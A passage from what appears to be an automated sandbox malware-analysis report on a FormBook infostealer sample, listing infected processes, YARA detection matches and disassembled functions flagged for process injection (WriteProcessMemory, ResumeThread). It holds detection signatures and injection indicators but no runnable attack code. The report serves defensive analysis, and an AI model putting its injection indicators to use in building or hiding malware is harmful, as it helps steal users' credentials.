Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4130273413.0000000005600000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.4130273413.0000000005600000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	07:25:03
Start date:	06/06/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	07:25:05
Start date:	06/06/2024
Path:	C:\Windows\SysWOW64\chkdsk.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\chkdsk.exe"
Imagebase:	0x9e0000
File size:	23'040 bytes
MD5 hash:	B4016BEE9D8F3AD3D02DD21C3CAFB922
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4130637411.0000000004DC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.4130637411.0000000004DC0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4128948206.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.4128948206.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4130704581.0000000004E00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.4130704581.0000000004E00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	07:25:19
Start date:	06/06/2024
Path:	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe"
Imagebase:	0x6b0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4132492127.00000000052A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.4132492127.00000000052A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	07:25:31
Start date:	06/06/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	17%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9B8905DB Relevance: 9.2, Strings: 7, Instructions: 406
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

N_^T, xrefs: 00007FFD9B890722
N_^U, xrefs: 00007FFD9B89072A
N_^], xrefs: 00007FFD9B89076A
N_^\, xrefs: 00007FFD9B890762
N_^^, xrefs: 00007FFD9B890772
N_^n, xrefs: 00007FFD9B8907BA
8K>, xrefs: 00007FFD9B89066E

Memory Dump Source

Source File: 00000000.00000002.1888694758.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID: 8K>$N_^T$N_^U$N_^\$N_^]$N_^^$N_^n
API String ID: 0-102522154
Opcode ID: 0072a6547858c374ab340eb966a53fa3f0ee0cd66cd8938031849241321e26db
Instruction ID: c6a3346294c21f821c80f2601b16a202cd4bd89d45e950016a2cc5c321d201ae
Opcode Fuzzy Hash: 0072a6547858c374ab340eb966a53fa3f0ee0cd66cd8938031849241321e26db
Instruction Fuzzy Hash: A4B15763B0952A4BD32EBBBCBC699F97B90DF8536970802BBD159CB0D3DC1464828381

Function 00007FFD9B9B04AB Relevance: 3.2, Strings: 1, Instructions: 1969COMMON

Download Yara Rule

Strings

A, xrefs: 00007FFD9B9B09C6

Memory Dump Source

Source File: 00000000.00000002.1889950685.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b9b0000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID: A
API String ID: 0-3554254475
Opcode ID: 2a3e88c18a47c19f2b564b77258a1e8d4909c1d8f8b14e6a2014b9f2ac267032
Instruction ID: 3bc10683d10133fbf41c73ce6eb283ecc4a01f840dba28eda1c456ce657e9eed
Opcode Fuzzy Hash: 2a3e88c18a47c19f2b564b77258a1e8d4909c1d8f8b14e6a2014b9f2ac267032
Instruction Fuzzy Hash: 5FD28B3292F7D95FEB66CB6888655A47FE0FF56700F0A05FED089CB0A3DA246905CB41

Function 00007FFD9B895D45 Relevance: 1.9, Instructions: 1899COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1888694758.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b55435bef5d56b9d12e26ca53e661722fcd7c33610aa6b30fee8368275ccc8d7
Instruction ID: abdbd8aa37bc08c09cfe4d162f6b46f1219ed6d77747785a955f88267fdfa011
Opcode Fuzzy Hash: b55435bef5d56b9d12e26ca53e661722fcd7c33610aa6b30fee8368275ccc8d7
Instruction Fuzzy Hash: 73E2A37061DB498FD778DF68C4A5A6AB7E1FF98300F11457DD48DC32A6DE34A8428B82

Function 00007FFD9B8920BD Relevance: 1.7, Strings: 1, Instructions: 476
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 00007FFD9B892458

Memory Dump Source

Source File: 00000000.00000002.1888694758.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 56487e72111f522c167fc06b0fb77d8013329768a692d9c501ab212c1494f8d7
Instruction ID: b67c387a9539316846ce67700ae57e29714722010747c95e077be15cd471c659
Opcode Fuzzy Hash: 56487e72111f522c167fc06b0fb77d8013329768a692d9c501ab212c1494f8d7
Instruction Fuzzy Hash: 86D1D821B1990D4FEB98EBAC98256797BD2EF9D750F0502BAE10DC73E2CD24BD418781

Function 00007FFD9B8908A5 Relevance: 1.7, Instructions: 1691
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1888694758.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9633c7b6d5fe00ab7282b11dcfc90f9339fca1c031a00362dec74e193f67cdf0
Instruction ID: 65fc47a05a33201606aeee6c0a7e7d9e7bff85f18e36bc83054d45b22d405592
Opcode Fuzzy Hash: 9633c7b6d5fe00ab7282b11dcfc90f9339fca1c031a00362dec74e193f67cdf0
Instruction Fuzzy Hash: ADD2AC30718B498FE70DDF6CD460A64B7F1EF9A744F0006AAE059DB2E3CE2AB944D615

Function 00007FFD9B8C6358 Relevance: .8, Instructions: 822COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1888694758.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54ff0eeebdb64ae6d58996ee2b44c7ac81f33779e981f73012e361a6066088f2
Instruction ID: d127f887fbec1d322496cacd8c956c403aaa78f402636239f1733a7d2d6a5b3e
Opcode Fuzzy Hash: 54ff0eeebdb64ae6d58996ee2b44c7ac81f33779e981f73012e361a6066088f2
Instruction Fuzzy Hash: 6442AC71B0D7854FD71AFB6898655B47BE1EF9A310B0945FBC089CB1E3DD18A846C382

Function 00007FFD9B8C1678 Relevance: .5, Instructions: 496COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1888694758.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06b7d34f0df2fdaa68c64efdac44af7ba8ceb9225f286524bf8bfc30795f6223
Instruction ID: e92ef35869420573604ac393420bb303058938f69b7164db65ec6bc78e5fea75
Opcode Fuzzy Hash: 06b7d34f0df2fdaa68c64efdac44af7ba8ceb9225f286524bf8bfc30795f6223
Instruction Fuzzy Hash: C4E12431A1DB0A8FD768EB5898629B5B7E1FF99310B1142BFD04DC71A3DE24B842C781

Function 00007FFD9B89A050 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1888694758.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 345723295742ab4d0f43056da9156930397efa71850a04675b9c883107c1a608
Instruction ID: 00366d94f77249dfce6c5556b58714c4f04b14a7d85b8881e29a0436492e876b
Opcode Fuzzy Hash: 345723295742ab4d0f43056da9156930397efa71850a04675b9c883107c1a608
Instruction Fuzzy Hash: C8A14662A1EFCE4FDB5D9B384864575BBA2EFA634070841FFD09AC71E7ED2568068301

Function 00007FFD9B8906F2 Relevance: 10.2, Strings: 8, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

N_^T, xrefs: 00007FFD9B890722
N_^R, xrefs: 00007FFD9B890712
N_^U, xrefs: 00007FFD9B89072A
N_^], xrefs: 00007FFD9B89076A
N_^\, xrefs: 00007FFD9B890762
N_^^, xrefs: 00007FFD9B890772
N_^N, xrefs: 00007FFD9B8906F2
N_^n, xrefs: 00007FFD9B8907BA

Memory Dump Source

Source File: 00000000.00000002.1888694758.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID: N_^N$N_^R$N_^T$N_^U$N_^\$N_^]$N_^^$N_^n
API String ID: 0-1536308144
Opcode ID: 4c9d4bdf2c54421adefda45db9dd67de708e614d584fbd9440b7e6921d176e83
Instruction ID: cbeb67d4ae8300a6e936c8890513fad1b32654f04db886a1dab2ab141a47b1ad
Opcode Fuzzy Hash: 4c9d4bdf2c54421adefda45db9dd67de708e614d584fbd9440b7e6921d176e83
Instruction Fuzzy Hash: FE415C93B0A5296AE72A67FC7CB99F91B84DF45778B0805F7E12DCA0D3EC0864428251

Function 00007FFD9B8906D3 Relevance: 7.7, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

N_^T, xrefs: 00007FFD9B890722
N_^U, xrefs: 00007FFD9B89072A
N_^], xrefs: 00007FFD9B89076A
N_^\, xrefs: 00007FFD9B890762
N_^^, xrefs: 00007FFD9B890772
N_^n, xrefs: 00007FFD9B8907BA

Memory Dump Source

Source File: 00000000.00000002.1888694758.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID: N_^T$N_^U$N_^\$N_^]$N_^^$N_^n
API String ID: 0-1754144147
Opcode ID: bd861551a8a3c2922fd316ea7232f9b52440fae94faf180b051fb717c85cfd1a
Instruction ID: 3c6153d81e1ebd236b488360ba6a69fcf9c73392ecef01e550075dd56e737e6a
Opcode Fuzzy Hash: bd861551a8a3c2922fd316ea7232f9b52440fae94faf180b051fb717c85cfd1a
Instruction Fuzzy Hash: E74158A3B0A52E5AE72A67FC7CB99E92F84DF857B5B0801FBE11DC60D3DC0864468241

Function 00007FFD9B89CEE3 Relevance: 6.5, Strings: 5, Instructions: 217
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

KuM_^,, xrefs: 00007FFD9B89CF70
tM_^, xrefs: 00007FFD9B89CFD1
KtM_^, xrefs: 00007FFD9B89D070
tM_^, xrefs: 00007FFD9B89CFC2
ktM_^, xrefs: 00007FFD9B89D050

Memory Dump Source

Source File: 00000000.00000002.1888694758.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID: tM_^$KtM_^$KuM_^,$ktM_^$tM_^
API String ID: 0-4053103246
Opcode ID: 827502dcde858a2db9816adca96fd4015c9a2f66f5a3f1b1eb3a43f3b31d6098
Instruction ID: bf51d65b5fa24e094596988dfb8a973c8a674c1e72131e2f5d1fca8b87b88635
Opcode Fuzzy Hash: 827502dcde858a2db9816adca96fd4015c9a2f66f5a3f1b1eb3a43f3b31d6098
Instruction Fuzzy Hash: EA51C347A0F2A64AEB2777BC387A4E92F60CF4626870D41F7D0DD4F0E3AC48254B9295

Function 00007FFD9B89CFFB Relevance: 3.9, Strings: 3, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

KtM_^, xrefs: 00007FFD9B89D070
tM_^, xrefs: 00007FFD9B89D02A
ktM_^, xrefs: 00007FFD9B89D050

Memory Dump Source

Source File: 00000000.00000002.1888694758.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID: tM_^$KtM_^$ktM_^
API String ID: 0-3532050811
Opcode ID: f4a07b685f8c62f413ea969c8ce9ca9fa6ffda6c57d95cd551bc8fee01135d50
Instruction ID: 7f3a49b623edc14216fc65cac1fc4efe69f5767b8473db53e9adda528e06147d
Opcode Fuzzy Hash: f4a07b685f8c62f413ea969c8ce9ca9fa6ffda6c57d95cd551bc8fee01135d50
Instruction Fuzzy Hash: 9F41B387B0F2EA0EEB2767BC78B54E92F60CF5621870941F7D0D94A0E3EC0825479345

Function 00007FFD9B894BE0 Relevance: 3.4, Strings: 2, Instructions: 861
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`L_H, xrefs: 00007FFD9B8ADBC3
H, xrefs: 00007FFD9B8AE0AC

Memory Dump Source

Source File: 00000000.00000002.1888694758.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID: H$`L_H
API String ID: 0-1628089336
Opcode ID: 8f7a4f43af8a1a89518ba0ba3a9ece6ea63b9910e564b3c5cc524cbdf168f84d
Instruction ID: a9d576ae4024cb69ef1dfbbf1637687173d6a2865224ea55e5240f9db868a099
Opcode Fuzzy Hash: 8f7a4f43af8a1a89518ba0ba3a9ece6ea63b9910e564b3c5cc524cbdf168f84d
Instruction Fuzzy Hash: 8F325632B0EA4E4FE7A99B6CA8656703BD2EF99350B0941BED04EC71E3DD15AC068350

Function 00007FFD9B891EFA Relevance: 2.7, Strings: 2, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

{BN_^, xrefs: 00007FFD9B892052
%N_^, xrefs: 00007FFD9B891F01

Memory Dump Source

Source File: 00000000.00000002.1888694758.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID: %N_^${BN_^
API String ID: 0-3045278425
Opcode ID: 108ad430012b2f304ead4ec6d4eb4369cb7952912fbe03dac88f0a8da9e38dab
Instruction ID: 93484a27089fdf87e58555ad1f2811787e596de23e41de9e4a4b4718d3a425f6
Opcode Fuzzy Hash: 108ad430012b2f304ead4ec6d4eb4369cb7952912fbe03dac88f0a8da9e38dab
Instruction Fuzzy Hash: 32516922B1964A4FFB59BBBC98327EA3BD0DF49354F4501B5D11DCB2E3DD2869018351

Function 00007FFD9B8A63D0 Relevance: 1.9, Strings: 1, Instructions: 624
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 00007FFD9B8A6739

Memory Dump Source

Source File: 00000000.00000002.1888694758.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 0cd813b81eaa6fc3894bacf87d54d99f529529585097ffcd979b1c3e33206742
Instruction ID: dc3e42ce78d9ffe7b4b0f514930bdf05beddedda3d532a3bf2c33638cd5b8463
Opcode Fuzzy Hash: 0cd813b81eaa6fc3894bacf87d54d99f529529585097ffcd979b1c3e33206742
Instruction Fuzzy Hash: 6B12F270619B098FD768DB58C4A4AB5B3E1FF99310F14467EC09EC36AADA34F842C781

Function 00007FFD9B89E1E0 Relevance: 1.7, Strings: 1, Instructions: 472
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

?X_H, xrefs: 00007FFD9B89E4D3

Memory Dump Source

Source File: 00000000.00000002.1888694758.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID: ?X_H
API String ID: 0-2928132314
Opcode ID: 8105264c79ad0ed99484a06aedafb65c4d82e6dd595d8a2840f59d761d6d55d5
Instruction ID: d6842610685ecf8c6aafcfdbe2325670d599b5d7e96744358fab3a36bc264f22
Opcode Fuzzy Hash: 8105264c79ad0ed99484a06aedafb65c4d82e6dd595d8a2840f59d761d6d55d5
Instruction Fuzzy Hash: FEF1E2B1A196598FEB58DF68D8657A8BBE0FF58304F1002BAE04DC72D2DF346981CB05

Function 00007FFD9BA30116 Relevance: 1.7, APIs: 1, Instructions: 210
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE ref: 00007FFD9BA30289

Memory Dump Source

Source File: 00000000.00000002.1890351937.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba30000_eNXDCIvEXI.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 6dc17d66754225acfe2cdb85b268559370e42361e397e548d62c816d8f3a4dc8
Instruction ID: f0a6967defd1abeb010c42520ad25f8cc59fd900eb02d1cc75b7b217c33d7430
Opcode Fuzzy Hash: 6dc17d66754225acfe2cdb85b268559370e42361e397e548d62c816d8f3a4dc8
Instruction Fuzzy Hash: F4611570908A5C8FDBA8DF98D895BE9BBF1FB69300F1041AED04DE3251DB74A985CB44

Function 00007FFD9B89E1D1 Relevance: 1.7, Strings: 1, Instructions: 436
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

?X_H, xrefs: 00007FFD9B89E4D3

Memory Dump Source

Source File: 00000000.00000002.1888694758.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID: ?X_H
API String ID: 0-2928132314
Opcode ID: 07cd470fd9441acf820fd690acff7510dce5672186efef7fe8f5e8ad9539e4f2
Instruction ID: 6fd11450ca3627d6ada445933e003f51dc36d515f38fbfd6479f378783aa6076
Opcode Fuzzy Hash: 07cd470fd9441acf820fd690acff7510dce5672186efef7fe8f5e8ad9539e4f2
Instruction Fuzzy Hash: 12F1D3B1A196498FEB54DF68C8657A8BBE1FF98304F1002BAE14DC32D2DF356981CB05

Function 00007FFD9BA304CA Relevance: 1.6, APIs: 1, Instructions: 141
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE ref: 00007FFD9BA305A2

Memory Dump Source

Source File: 00000000.00000002.1890351937.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba30000_eNXDCIvEXI.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: fb95a4d151789809562109abd5f649d1949dbb999b358cbdba941e56b8880cea
Instruction ID: 1ce281458936a73735172a7a25f6c3fd8ec8a53a0af40ceb3020a1a1119d2edc
Opcode Fuzzy Hash: fb95a4d151789809562109abd5f649d1949dbb999b358cbdba941e56b8880cea
Instruction Fuzzy Hash: 0A413B70A0864C8FDB98DFA8D495BEDBBF0EF56310F1441AED04DE7252DA71A485CB40

Function 00007FFD9B891ED3 Relevance: 1.5, Strings: 1, Instructions: 213
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

{BN_^, xrefs: 00007FFD9B892052

Memory Dump Source

Source File: 00000000.00000002.1888694758.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID: {BN_^
API String ID: 0-995101580
Opcode ID: 50cfb7f75e4e47b030d8d7035b94d75f04b1c657731207b2aa51acb3973d264a
Instruction ID: a65d18bea2c969b7dfd50d63bfd745e16008dccc756325f1b31dc9c8939e7508
Opcode Fuzzy Hash: 50cfb7f75e4e47b030d8d7035b94d75f04b1c657731207b2aa51acb3973d264a
Instruction Fuzzy Hash: 53617922B0D65A4FEB19B7BCA8726EA3B90DF45358F0501F6D05DCB1E3ED1C69428381

Function 00007FFD9B8BA8D0 Relevance: 1.4, Strings: 1, Instructions: 154COMMON

Download Yara Rule

Strings

{K_H, xrefs: 00007FFD9B8BA96F

Memory Dump Source

Source File: 00000000.00000002.1888694758.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID: {K_H
API String ID: 0-2760970905
Opcode ID: b91e55e9d698247829630a88daf5dc58d1d513adaefc66e4e3e5fe57aee02de9
Instruction ID: 896cc0fd543fa58fa123decb0a16629f4254a9423a0e0566d70b586c59a0faf5
Opcode Fuzzy Hash: b91e55e9d698247829630a88daf5dc58d1d513adaefc66e4e3e5fe57aee02de9
Instruction Fuzzy Hash: A941D031B19E1E6BEBA8DB68547477426C2EB9C340F0541BAD41ECB2D7DD35AD428B80

Function 00007FFD9B895F85 Relevance: 1.4, Strings: 1, Instructions: 149COMMON

Download Yara Rule

Strings

{K_H, xrefs: 00007FFD9B8BA96F

Memory Dump Source

Source File: 00000000.00000002.1888694758.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID: {K_H
API String ID: 0-2760970905
Opcode ID: e166fe0a8304e8f6369a3c411c33f842267d7f0989256199c2bf6940157af518
Instruction ID: 370b237a50d9667405356a92201132c0235effa211f2dfc9ba8c0a7cac0e49de
Opcode Fuzzy Hash: e166fe0a8304e8f6369a3c411c33f842267d7f0989256199c2bf6940157af518
Instruction Fuzzy Hash: 1B412931B09A2E5BEB6CA76CA4756B837C1EF98314F0541BAE01DCB1E7DD35AD428680

Function 00007FFD9B89D6D2 Relevance: 1.4, Strings: 1, Instructions: 125COMMON

Download Yara Rule

Strings

MM_H, xrefs: 00007FFD9B89D76E

Memory Dump Source

Source File: 00000000.00000002.1888694758.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID: MM_H
API String ID: 0-1969015126
Opcode ID: 59055a70a8330eb04976351e6d60ea4d7e5f68c3ab618c45ae2d2458e5ba7e54
Instruction ID: 8839d5cd359a57c3b813cdba8a81686c150f3e60135a5648320da42c41a45420
Opcode Fuzzy Hash: 59055a70a8330eb04976351e6d60ea4d7e5f68c3ab618c45ae2d2458e5ba7e54
Instruction Fuzzy Hash: B8314C3270DA498FE759EB2CA869A647FE1EF9A35071502FBD05CCB2A3DD15AC058341

Function 00007FFD9B89D6F0 Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

MM_H, xrefs: 00007FFD9B89D76E

Memory Dump Source

Source File: 00000000.00000002.1888694758.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID: MM_H
API String ID: 0-1969015126
Opcode ID: a23d92b099b52a35516ba804dbd9dcc74570d2fc37e27389dd8a1ad1ca2bdb57
Instruction ID: c6fd3d945a1d6da0c9c775db97eebc8946ecd173cd29779e00710dbdc51bdd87
Opcode Fuzzy Hash: a23d92b099b52a35516ba804dbd9dcc74570d2fc37e27389dd8a1ad1ca2bdb57
Instruction Fuzzy Hash: A9310B32719A0D8FE75CEA2CA859964BBE1EF9D35071502FFE01DC72A2ED11AC458341

Function 00007FFD9B89E060 Relevance: 1.3, Strings: 1, Instructions: 1COMMON

Download Yara Rule

Strings

5L_H, xrefs: 00007FFD9B8B06C3

Memory Dump Source

Source File: 00000000.00000002.1888694758.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID: 5L_H
API String ID: 0-3658820370
Opcode ID: 353e49474e2b483f04510b765ba17cdc553c0c4b5a17dc3f8f480f763b4af6d3
Instruction ID: 6fbec0e02b68655398cced106af4c1149764b708f85cdfc2a056b0439ad247b9
Opcode Fuzzy Hash: 353e49474e2b483f04510b765ba17cdc553c0c4b5a17dc3f8f480f763b4af6d3
Instruction Fuzzy Hash:

Function 00007FFD9B89507F Relevance: .8, Instructions: 833COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1888694758.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dbc9a842c4237ce23b85cfa0e89371dd7b2d323f4700824c11483edf47858dd
Instruction ID: 26883df08f44c7df51bafeb64f2b1e9cf74c6edc524abe547f0105218db55891
Opcode Fuzzy Hash: 5dbc9a842c4237ce23b85cfa0e89371dd7b2d323f4700824c11483edf47858dd
